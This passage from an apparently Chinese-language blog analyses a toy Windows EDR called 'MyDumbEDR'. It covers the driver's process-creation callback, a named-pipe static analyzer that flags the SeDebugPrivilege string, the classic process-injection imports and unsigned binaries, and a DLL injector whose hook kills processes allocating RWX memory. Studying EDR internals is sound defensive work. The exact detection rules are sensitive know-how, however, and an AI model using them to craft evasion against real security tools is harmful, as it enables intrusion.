  358.     NTSTATUS ret = PsSetCreateProcessNotifyRoutineEx(CreateProcessNotifyRoutine, FALSE);
  359.     if (ret == STATUS_SUCCESS) {
  360.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “[MyDumbEDR] Driver launched successfully\n”);
  361.     }
  362.     else if (ret == STATUS_INVALID_PARAMETER) {
  363.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “[MyDumbEDR] Invalid parameter\n”);
  364.     }
  365.     else if (ret == STATUS_ACCESS_DENIED) {
  366.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “[MyDumbEDR] Access denied\n”);
  367.     }
  369.     return 0;
  370. }

代码分析

首先把EDR跟静态分析和动态分析的EXE启动
  1. sc start MyDumbEDR
  2. analyze_static.exe
  3. MyDumbEDRRemoteInjector.exe
首先看驱动
首先设置驱动删除的回调
在删除回调中删除了驱动Dervice、SymbolLlink和设置CreateProcess的回调
设置驱动退出回调后,创建驱动设备与符号
最后是CreateProcess的回调设置
在回调中首先获得创建进程的PID、进程名、父进程、进程运行参数
接着判断如果进程名是ShellCodeInject.exe,就进入下一步。
如果参数是notepad.exe,禁止运行
如果参数不是notepad.exe,进入后续检查,第一个是静态检查模块
在静态检查中首先连接\\??\\pipe\\dumbedr-analyzer  PIPE。这个管道是静态检查的Agent创建的
连接之后将待检查的程序路径传过去,然后等待PIPE回信
这里去看静态检查Agent的analyze_static.exe代码
首先创建 \\??\\pipe\\dumbedr-analyzer  PIPE,就是刚刚驱动连接的管道
之后一个whlie(1)循环,等待从管道读取信息
读取信息后,第一个判断进程中有没有SeDebugPrivilege静态字符串
第二个查导入表,是否存在OpenProcess、VirtuallocEx、WriteProcessMemory、CreateRemoteThread四个函数
第三个查这个进程有没有微软签名
三个检查之后,如果是签名的程序就OK,如果存在静态字符或者危险的导入函数就KO。然后将结果通过管道传回给驱动
静态分析Agentanalyze_static.exe就结束了,驱动接收到管道传的值,如果是OK返回0,KO返回1
如果静态分析返回1,直接拦截,如果返回0,进入DLL注入
Dll注入跟静态分析类似,通过PIPE将数据发给Agent,然后阻塞等待返回
MyDumbEDRRemoteInjector.exe,也是一样先从PIPE里面拿到程序的PID,
然后通过远程线程注入,将DLL注入到进程中
注入完之后把,注入结果通过PIPE发送给驱动
接着看注入的Dll
DllMain里面CreateThread到Hook里面,判断申请内存是不是RWX,如果是就弹窗然后结束当前进程。
这就是最后的效果